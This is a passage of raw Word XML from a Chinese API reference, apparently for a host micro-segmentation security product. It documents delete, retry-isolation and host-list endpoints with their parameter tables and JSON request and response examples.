        <w:t>DELETE /external/api/ms-srv/api/segmentation/realDel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED6994D"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630"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1284"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="3F341C0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9C3F0CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CF98313" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B2635E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63EE11F7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3E9EBB3E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D241694" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C830407" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="493E7FB2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DB5B2F1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机Id数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A81FE61" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1808CCAC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "agentIds":["5fa27259dae9af8a"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A09882" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40078BA4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "success": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorCode": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorDesc": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "data": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C84F94D"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169"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="3420"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="5F75E64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45D004D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EE1513B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34F6144F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5FE4A140" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4910FC60" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BAED800" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DA14BC4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否成功，true：成功，false：失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="25E1C1E8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="610B089D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>errorCode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F564C3E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CB7E53B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>状态码，0：成功，其他异常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3C1CC471" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60D8A0F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>errorDesc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71A43311" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4347FF5F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>异常描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36A8F03A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="221" w:name="重试隔离接口"/>
      <w:bookmarkEnd w:id="220"/>
      <w:r>
        <w:t>重试隔离接口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A14BE5C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D7885E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/ms-srv/api/segmentation/retry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9759C9"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630"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1284"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="55A27BFB"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C5C537A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CFB58E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="218E2069" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="647E201A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0046C0A1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="557B33A9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7279AE50" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41211DB0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E7CAEB2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机Id数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35588B6C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E98B26" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "agentIds":["5fa27259dae9af8a"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8BFBA9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2742477B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "success": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorCode": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorDesc": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "data": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BCFF4B"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169"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="3420"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="07A9037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19AB045" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3669209B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A14B678" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="76550E7C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79F6DF64" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EE50681" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03372A0E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否成功，true：成功，false：失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="46714753" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38199C1E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>errorCode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4986F90C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A0D2C81" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>状态码，0：成功，其他异常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1F680D9D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02CA1BAA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>errorDesc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E93FA70" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DFB5E94" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>异常描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="75DEFC33" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="222" w:name="微隔离主机管理接口"/>
      <w:bookmarkEnd w:id="214"/>
      <w:bookmarkEnd w:id="221"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>微隔离主机管理接口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067E2B44" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="223" w:name="查询主机列表"/>
      <w:r>
        <w:t>查询主机列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314E7133" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29596C6C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/ms-srv/api/hosts/list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A13C3B"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2177"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="987"/>
        <w:gridCol w:w="5912"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="362A04A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2908AD5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E2B00B2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22C6750C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="328512AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0FF6A1E8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0500A4E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04C2000B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2188513B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05A116DC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0A7F8DDE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03AE0CAA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47287EE5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7798E650" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FC88412" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="028215F8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A7243A1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C996A5A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5491E9FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CCA934E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机标签id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1E3045FA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53917DAB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>msEnabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F8EFA45" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B23D7D2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="291B7A51" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>微隔离插件开关：null全部 0关闭 1开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5CFADE8F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CF94569" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>accessControlMode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41E8B2D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
